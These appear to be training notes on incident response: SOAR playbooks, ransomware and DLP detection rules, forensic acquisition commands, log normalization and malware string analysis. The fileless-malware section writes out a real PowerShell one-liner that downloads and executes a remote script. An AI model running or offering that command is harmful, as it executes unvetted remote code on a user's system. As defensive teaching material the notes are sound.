- Incident Response Playbooks and Automation
- Understanding Incident Response Playbooks
- Agent-Based Log Collection
- Security Automation Fundamentals
- Real-World SOAR Integration Example
- Detection Rule Examples
- Email-Based Detection Rule
- Ransomware Detection Rule
- Ransomware Response Playbook Structure
- Playbook Flow for Suspected Ransomware Infection
- Forensic Acquisition Runbook
- Detailed Forensic Collection Steps
- Understanding File Deletion and Recovery
- Windows Event Log Analysis
- SIEM Data Structure and Investigation Flow
- Case Management and Documentation
- Entity Extraction and Enrichment
- Log Parsing and Normalization
- Understanding Log Parsing
- Normalization Process Example
- Fileless Malware Execution
- Windows API for File Operations
- Analyzing Request Patterns
- Malware String Analysis
- SIEM Detection Pipeline
- The Complete Detection Flow
- Data Loss Prevention Integration
- Microsoft Purview DLP
- Alert Tuning and False Positive Reduction
- Array Processing Logic
Incident Response Playbooks and Automation
Understanding Incident Response Playbooks
An incident response playbook is a short, predefined guide that tells teams exactly what to do when a security incident happens. It outlines the steps to detect, contain, investigate, and recover from threats so actions are fast and consistent. By following it, responders avoid confusion and reduce damage by knowing who does what and when.
Playbooks exist on a spectrum ranging from manual processes where human analysts perform every step, to semi-automated workflows where some tasks are manual and others are automated, to fully automated playbooks where the entire response chain executes without human intervention. An example of automation logic would be checking if a hash of an executable matches a known Metasploit hash and automatically triggering isolation of the affected system.
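A minimal Python sketch of that automation logic, using a hypothetical watchlist and triage function (the placeholder entry is the SHA-256 of empty input, standing in for a real known-bad hash):

```python
import hashlib

# Hypothetical watchlist of known-bad SHA-256 hashes (e.g., Metasploit payloads).
# The entry below is the SHA-256 of empty input, used only as a stand-in.
KNOWN_BAD_HASHES = {
    "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}

def file_sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def triage(executable_bytes: bytes, hostname: str) -> str:
    """If the executable's hash is on the watchlist, trigger isolation."""
    if file_sha256(executable_bytes) in KNOWN_BAD_HASHES:
        return f"ISOLATE {hostname}"   # automated containment action
    return "NO ACTION"
```

In a real playbook the isolation action would be an API call to the EDR/XDR platform rather than a returned string.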
Agent-Based Log Collection
Organizations deploy agents or forwarders by installing them on endpoints to enable log collection. If the installation process requires ten scripts and three commands to be executed, these can be consolidated into a single script. An administrator can then RDP into the machine, run the script, and achieve automated execution of all required setup steps.
Security Automation Fundamentals
Automation is the use of tools or scripts to perform security tasks without manual effort. It reduces human error and speeds up repetitive processes like alert triage or log collection.
SOAR (Security Orchestration, Automation, and Response) connects security tools together, automates actions, and guides analysts through response workflows. It helps teams handle incidents faster and more efficiently.
Real-World SOAR Integration Example
A company's SIEM (like Microsoft Sentinel) detects that a user account is attempting logins from two countries within minutes, triggering an alert. Analysts would normally investigate manually, but the SOAR playbook steps in automatically. It enriches the alert with geo-data, checks recent activity, and quarantines the account if risk is confirmed. In this real-world flow, the SIEM spots the abnormal behavior, and the SOAR acts on it instantly.
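The impossible-travel condition and the automated response can be sketched as follows; the function names, window length, and event shape are hypothetical, not Sentinel's actual schema:

```python
from datetime import datetime, timedelta

def impossible_travel(logins, window=timedelta(minutes=10)):
    """logins: list of (timestamp, country) tuples. True when two different
    countries appear within the window -- 'two countries within minutes'."""
    for i, (t1, c1) in enumerate(logins):
        for (t2, c2) in logins[i + 1:]:
            if c1 != c2 and abs(t2 - t1) <= window:
                return True
    return False

def soar_playbook(account, logins, risk_confirmed):
    """Sketch of the automated flow: detect, then quarantine if risk is confirmed."""
    if impossible_travel(logins) and risk_confirmed:
        return {"account": account, "action": "quarantine"}
    return {"account": account, "action": "monitor"}
```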
Detection Rule Examples
Email-Based Detection Rule
A rule can be configured to detect suspicious email activity using conditions such as checking if the email sender is unique AND the email has recipients at more than two different domains AND the mean time between sends is three minutes. Upon confirmation, the system can send a verification email to the user and escalate the alert to the sales department for review.
rule: if $email.sender="unique" AND $email.recipient.domains > 2 AND mean.time.between.sends = "3min"
Ransomware Detection Rule
An alert titled Suspected Ransomware Infection triggers based on specific conditions. The rule checks if the file extension equals ".medusa" AND the action indicates file changes equal TRUE AND the number of changed files exceeds 100. The logs would show data organized by host, filename, and extension. For example, you might see entries showing dev-81 with files like document.exe and screenshot1.exe, dev-01 with lovepdf.exe, and critically dev-81 with monthlyreportQ2 now having the .medusa extension indicating encryption.
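A minimal Python sketch of this condition, using hypothetical event dictionaries for the file-change logs:

```python
def suspected_ransomware(file_events, threshold=100):
    """file_events: dicts with 'host', 'filename', 'extension', 'changed'.
    Mirrors the rule: extension ".medusa" AND changed files AND count > 100."""
    hits = [e for e in file_events
            if e["extension"] == ".medusa" and e["changed"]]
    return len(hits) > threshold
```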
rule: if $file.extension=".medusa" AND $action.change.file=TRUE AND change.file.number > 100
Ransomware Response Playbook Structure
Playbook Flow for Suspected Ransomware Infection
The playbook begins when an Alert for Suspicious Encryption Activity triggers the automated response. Node 1 confirms whether ransomware is present. If Yes, the flow continues; if No, the alert is closed or monitored for further activity.
Node 2 executes endpoint isolation through the XDR platform. The agent installed on the machine has access to the device with higher privileges and executes the isolation action remotely.
Node 3 notifies leadership and the IR Lead using API keys or OAuth2 authentication which allows the system to send emails automatically without manual intervention.
Node 4 triggers the forensics workflow to begin evidence collection and analysis.
Node 5 presents the decision point where the team must choose between containment strategies or moving to eradication.
Forensic Acquisition Runbook
Detailed Forensic Collection Steps
The runbook for Forensic Acquisition of a Compromised Host provides step-by-step technical instructions.
Step 1: Log into the isolated forensic VLAN to ensure network separation.
Step 2: Stop network services with sudo systemctl stop network-manager to prevent any network communication during acquisition.
Step 3: Acquire the disk image with sudo dd if=/dev/sda of=/evidence/host.img bs=4M to create a bit-by-bit copy.
Step 4: Calculate integrity hashes with sha256sum host.img > host.img.sha256 to prove the evidence has not been altered.
Step 5: Capture a memory dump with LiME, which is loaded as a kernel module, e.g. sudo insmod lime.ko "path=/evidence/memdump.lime format=lime", to preserve volatile data.
Step 6: Collect additional volatile data with commands such as ps, netstat, and lsof (or Autoruns on Windows hosts); the memory dump can later be analyzed with Volatility (vol.py).
Step 7: Tag all evidence and move it to the secure evidence repository for preservation.
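The integrity-hash step can also be performed (or re-verified later in the lab) with a short script; this is a sketch, and the chunked read simply mirrors dd's bs=4M so large images never have to fit in memory:

```python
import hashlib

def sha256_file(path, chunk_size=4 * 1024 * 1024):
    """Hash the image in 4 MiB chunks so large evidence files stream through."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_evidence(image_path, recorded_hex):
    """Re-hash the image and compare against the recorded sha256sum value."""
    return sha256_file(image_path) == recorded_hex
```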
Understanding File Deletion and Recovery
When a file like reportQ3.pdf is deleted from disk by a normal user, it moves to the recycle bin. When deleted from the recycle bin, the user believes the file is gone forever. However, during disk image acquisition, the bit-by-bit copy of the disk can recover this data because deletion doesn't immediately overwrite the actual file content.
The file system uses pointers to track file locations. Pointer @1 might point to reportQ1.pdf, pointer @2 to reportQ2.pdf, and pointer @3 originally pointed to reportQ3.pdf. When reportQ3.pdf is deleted, only the pointer is removed, marking that disk space as free. The disk might show 1GB increasing to 1.2GB free space, but the binary data representing reportQ3.pdf and document.txt still exists on the physical disk until overwritten.
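A toy model of this behavior (the table, disk contents, and function names are illustrative, not a real file system):

```python
# The file table holds pointers; the raw disk holds the actual bytes.
file_table = {"@1": "reportQ1.pdf", "@2": "reportQ2.pdf", "@3": "reportQ3.pdf"}
raw_disk = {"reportQ3.pdf": b"%PDF... Q3 figures", "document.txt": b"notes"}

def delete_file(name):
    """'Deleting' removes only the pointer and marks the space as free."""
    for ptr, fname in list(file_table.items()):
        if fname == name:
            del file_table[ptr]

def carve(name):
    """A bit-by-bit image still contains the bytes until they are overwritten."""
    return raw_disk.get(name)

delete_file("reportQ3.pdf")
```

After the delete, the pointer @3 is gone, yet carve("reportQ3.pdf") still returns the content, which is exactly why disk imaging can recover "deleted" files.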
Windows Event Log Analysis
Windows event logs stored in security.evtx files contain critical security events. Investigators focus on specific EventCodes including 4625 for failed logons, 4624 for successful logons, 4768 for Kerberos authentication ticket requests, 4769 for Kerberos service ticket requests, and 4634 for logoffs. This filtering helps identify authentication-related suspicious activity.
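The EventCode filter described above might look like this in Python, assuming events have already been parsed into dictionaries:

```python
AUTH_EVENT_CODES = {"4625", "4624", "4768", "4769", "4634"}

def auth_events(events):
    """Equivalent of: EventCode IN ("4625", "4624", "4768", "4769", "4634")."""
    return [e for e in events if e.get("EventCode") in AUTH_EVENT_CODES]
```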
wineventlogs -> file "security.evtx" -> EventCode IN ("4625", "4624", "4768", "4769", "4634")
SIEM Data Structure and Investigation Flow
SIEM platforms organize data using field and value pairs. For example, the IP field might contain value 12.12.12.12, the hash field contains a file hash like hckhaepfvgerhfiopqFHJERO, and the eventid field contains values like 6578. When an alert triggers an investigation, analysts use the SIEM to identify missing points in the timeline. They may need to acquire disk images and memory dumps, then analyze them using tools like FTK for disk forensics and vol.py for memory analysis.
Case Management and Documentation
Analysts can add notes, update executive summaries, and rely on the case wall for a chronological record of all actions, including automated playbooks. This documentation trail ensures accountability and supports post-incident review.
Entity Extraction and Enrichment
Entities like IPs, hostnames, usernames, file hashes, and domains are automatically extracted and normalized through Marketplace integrations. This enables quick enrichment and correlation with threat intelligence from sources like VirusTotal and Mandiant, reducing manual configuration and accelerating investigation and response.
Log Parsing and Normalization
Understanding Log Parsing
Log parsing in SIEM converts raw logs into a standardized format, making the data easier to analyze. During the normalization phase, data from different log sources is aligned and categorized into uniform fields.
Normalization Process Example
When focusing on IP addresses across different log sources, each source may use different field names. Windows event logs after parsing might use ip.addr, Sysmon logs might use ip.src, and email logs might use ipsrc. The normalization phase unifies all these variations into a single standardized field name like source.ipaddress. This allows analysts to query one field name regardless of the original log source.
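A minimal sketch of this unification step, using a field-alias map (the mapping itself is hypothetical):

```python
# Per-source field aliases, all mapped to one canonical name.
FIELD_MAP = {
    "ip.addr": "source.ipaddress",  # Windows event logs
    "ip.src": "source.ipaddress",   # Sysmon
    "ipsrc": "source.ipaddress",    # email logs
}

def normalize(record):
    """Rename per-source fields to the unified schema; unknown fields pass through."""
    return {FIELD_MAP.get(k, k): v for k, v in record.items()}
```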
IP addresses can be identified using regex patterns matching the format of one to three digits, dot, one to three digits, dot, one to three digits, dot, one to three digits. For finding MD5 hashes in files, you can use grep with the pattern matching 32 hexadecimal characters.
IP address regex: ([0-9]{1,3}\.){3}[0-9]{1,3}
grep -iE "[0-9a-f]{32}" yourfile.txt
When the source.ipaddress field is created through normalization, it can contain IP address information from four different types of original log sources, making correlation significantly easier.
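The same extraction can be done programmatically; this sketch applies both patterns to free text (the function name and return shape are illustrative):

```python
import re

IP_RE = re.compile(r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b")     # 1-3 digits x 4
MD5_RE = re.compile(r"\b[0-9a-fA-F]{32}\b")                  # 32 hex characters

def extract_iocs(text):
    """Pull candidate IPs and MD5 hashes out of raw log text."""
    return {"ips": IP_RE.findall(text), "md5s": MD5_RE.findall(text)}
```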
Fileless Malware Execution
Consider the PowerShell command that uses Invoke-RestMethod and Invoke-Expression together. This command silently downloads a remote script from the given URL and immediately executes it in memory. Because it uses irm (Invoke-RestMethod) piped into iex (Invoke-Expression), nothing is written to disk. This technique is commonly used by attackers to run payloads directly and should never be executed unless the source is fully trusted.
irm https://get.activated.win/ | iex
Windows API for File Operations
The CreateFile Windows API function demonstrates how applications interact with files at the system level. This function takes parameters including lpFileName for the file path, dwDesiredAccess for access rights, dwShareMode for sharing permissions, lpSecurityAttributes for security settings, dwCreationDisposition for creation behavior, dwFlagsAndAttributes for file attributes, and hTemplateFile for template file handles. Understanding these API calls helps investigators analyze how malware interacts with the file system.
HANDLE CreateFile(
LPCWSTR lpFileName,
DWORD dwDesiredAccess,
DWORD dwShareMode,
LPSECURITY_ATTRIBUTES lpSecurityAttributes,
DWORD dwCreationDisposition,
DWORD dwFlagsAndAttributes,
HANDLE hTemplateFile
);
Analyzing Request Patterns
In Splunk, you can search the last hour of data to identify which IP address made the most requests. Understanding traffic patterns helps identify potential denial-of-service attacks, scanning activity, or data exfiltration attempts.
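Outside of Splunk, the same "top talker over the last hour" question can be answered with a few lines of Python; the request format here is hypothetical:

```python
from collections import Counter
from datetime import datetime, timedelta

def top_requester(requests, now, window=timedelta(hours=1)):
    """requests: list of (timestamp, src_ip). Return (ip, count) for the
    busiest source inside the window, like a top-N search over the last hour."""
    recent = [ip for ts, ip in requests if now - ts <= window]
    return Counter(recent).most_common(1)[0] if recent else None
```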
Malware String Analysis
Using the strings command against a malicious executable and piping it through grep searching for CreateRemoteThread can reveal whether the malware uses process injection techniques. CreateRemoteThread is a Windows API commonly used in malicious code injection.
strings mal.exe | grep -i "CreateRemoteThread"
SIEM Detection Pipeline
The Complete Detection Flow
The SIEM detection pipeline follows a structured flow from Collection through Processing to Information to Detection and finally Alert generation. Collection gathers data from endpoints, servers, networks, and security tools. Processing involves parsing and normalization to standardize the data. Information represents the easy-to-use format with correlation based on unified field names. Detection applies rules or machine learning models to identify threats. As a result of detection, an alert is generated containing a title, description, and the detection query used.
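The stages above can be sketched as a chain of small functions; the key=value log format and the toy detection rule are assumptions for illustration:

```python
def collect(sources):
    """Collection: gather raw log lines from every source."""
    return [line for src in sources for line in src]

def process(lines):
    """Processing: parse key=value pairs into field/value dictionaries."""
    return [dict(pair.split("=", 1) for pair in line.split()) for line in lines]

def detect(records):
    """Detection: a toy rule looking for the .medusa extension."""
    return [r for r in records if r.get("extension") == ".medusa"]

def to_alert(hits):
    """Alert: title, description, and the detection query that fired."""
    if not hits:
        return None
    return {"title": "Suspected Ransomware Infection",
            "description": f"{len(hits)} file(s) matched",
            "query": 'extension=".medusa"'}
```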
Data Loss Prevention Integration
Data Classification involves tagging sensitive information, such as marking PDF files as secret, public, private, or confidential, and then applying actions based on detection rules or machine learning models. For example, a rule might state that if a document is tagged as secret AND email recipients are NOT in the same domain, the action should be to block the transmission and send a notification to the SOC.
An example scenario shows an email being sent from tarq@josales.com to multiple recipients including semo@josales.com, laith@josales.com, hanna@josales.com, sama@josales.com, and critically saba@johr.com who is outside the company domain. This would trigger the DLP rule.
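A minimal Python sketch of this check, with the addresses from the scenario (function name and return shape are hypothetical):

```python
def dlp_decision(tag, sender, recipients):
    """Mirror of the rule: tag=secret AND any recipient outside the sender's
    domain -> block and notify the SOC."""
    domain = sender.split("@", 1)[1]
    external = [r for r in recipients if r.split("@", 1)[1] != domain]
    if tag == "secret" and external:
        return {"action": "block", "notify": "SOC", "external_recipients": external}
    return {"action": "allow", "notify": None, "external_recipients": external}
```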
rule: tag=secret AND email.recipients NOT in $same.domain -> action -> block and send a notification to the SOC
Microsoft Purview DLP
In Microsoft Purview, DLP (Data Loss Prevention) is a compliance solution that uses policies to identify, monitor, and automatically protect an organization's sensitive information across various locations like Microsoft 365, endpoints, and cloud apps. It helps prevent accidental or unauthorized sharing of data to meet regulatory requirements and safeguard intellectual property. Banking institutions commonly use regex patterns to identify sensitive data like account numbers and routing information.
Alert Tuning and False Positive Reduction
In the SOC workflow, Level 1 analysts encounter false positives and must add comments explaining why the alert was incorrectly triggered. These cases go under tuning review where Detection Engineers edit the rule to reduce false positives. This continuous improvement cycle ensures detection rules become more accurate over time.
Array Processing Logic
When processing arrays of data elements, systems iterate through each element performing specified actions. Given an array containing data0, data1, data2, data3, and data4, the system processes data0 with its action, then data1 with its action, continuing through data2 and subsequent elements until reaching the end of the array and finishing the processing loop.
[data0, data1, data2, data3, data4] -> data0 -> action, data1 -> action, data2 -> action [complete] -> finish
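The loop above is the standard iterate-and-apply pattern; a minimal Python version might look like this:

```python
def process_array(items, action):
    """Apply the action to each element in order, collecting the results."""
    results = []
    for item in items:               # data0 -> action, data1 -> action, ...
        results.append(action(item))
    return results                   # finish after the last element
```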